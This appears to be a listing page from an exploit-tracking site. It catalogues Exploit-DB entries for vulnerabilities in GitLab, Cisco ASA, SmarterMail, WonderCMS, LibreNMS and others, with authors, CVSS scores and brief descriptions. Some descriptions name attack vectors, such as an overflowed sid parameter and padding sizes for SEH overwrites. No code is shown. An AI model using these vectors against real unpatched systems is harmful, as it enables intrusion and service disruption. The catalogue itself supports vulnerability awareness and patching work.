Exploitdb Exploits
4,724 exploits tracked across all sources.
GitLab CE/EE <11.3.11-11.5.1 - CRLF Injection
GitLab CE/EE versions 8.18 up to 11.x before 11.3.11, 11.4.x before 11.4.8, and 11.5.x before 11.5.1 have CRLF Injection in Project Mirroring when using the Git protocol.
by Norbert Hofmann
CVSS 7.5
10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
by Florian Gassner
SyncBreeze 10.0.28 - DoS
SyncBreeze 10.0.28 contains a denial of service vulnerability in the login endpoint that allows remote attackers to crash the service. Attackers can send an oversized payload in the login request to overwhelm the application and potentially disrupt service availability.
by Ahmed Elkhressy
CVSS 7.5
Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
by Yilmaz Degirmenci
Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)
by Andrea Bruschi
Cisco ASA/FTD - Path Traversal
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
by Freakyclown
CVSS 7.5
LibreNMS 1.46 - Authenticated SQL Injection
LibreNMS 1.46 contains an authenticated SQL injection vulnerability in the MAC accounting graph endpoint that allows remote attackers to extract database information. Attackers can exploit the vulnerability by manipulating the 'sort' parameter with crafted SQL injection techniques to retrieve sensitive database contents through time-based blind SQL injection.
by Hodorsec
CVSS 7.1
MiniWeb HTTP server 0.8.19 - DoS
MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the first parameter in a POST request.
by securityforeveryone.com
CVSS 7.5
GitLab CE/EE <11.3.11-11.5.1 - CRLF Injection
GitLab CE/EE versions 8.18 up to 11.x before 11.3.11, 11.4.x before 11.4.8, and 11.5.x before 11.5.1 have CRLF Injection in Project Mirroring when using the Git protocol.
by Fortunato Lodari
CVSS 7.5
Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
by Maximilian Barz
Flexense DupScout Enterprise 10.0.18 - Buffer Overflow
A buffer overflow in the web server of Flexense DupScout Enterprise 10.0.18 allows a remote anonymous attacker to execute code as SYSTEM by overflowing the sid parameter via a GET /settings&sid= attack.
by Andrés Roldán
CVSS 9.8
SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution
SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when port 17001 was remotely accessible. This port is not accessible remotely by default after applying the Build 6985 patch.
by 1F98D
CVSS 9.8
Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
by 0rbz_
Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
by Valerio Alessandroni
Wondercms - SSRF
A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to execute arbitrary code via a crafted URL to the theme/plugin installer.
by zetc0de
CVSS 9.8
Wondercms - OS Command Injection
A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer.
by zetc0de
CVSS 9.8
10-Strike Network Inventory Explorer <8.65 - RCE
10-Strike Network Inventory Explorer 8.65 contains a buffer overflow vulnerability in exception handling that allows remote attackers to execute arbitrary code. Attackers can craft a malicious file with 209 bytes of padding and a specially constructed Structured Exception Handler to trigger code execution.
by Sectechs
CVSS 9.8
WordPress EventON <3.0.5 - XSS
The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
by B3KC4T
CVSS 6.1
Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection
by naivenom
Setelsa Conacwin 3.7.1.2 - Local File Inclusion
by Bryan Rodriguez Martin
YATinyWinFTP - DoS
YATinyWinFTP contains a denial of service vulnerability that allows attackers to crash the FTP service by sending a 272-byte buffer with a trailing space. Attackers can exploit the service by connecting and sending a malformed command that triggers a buffer overflow and service crash.
by strider
CVSS 9.8
By Source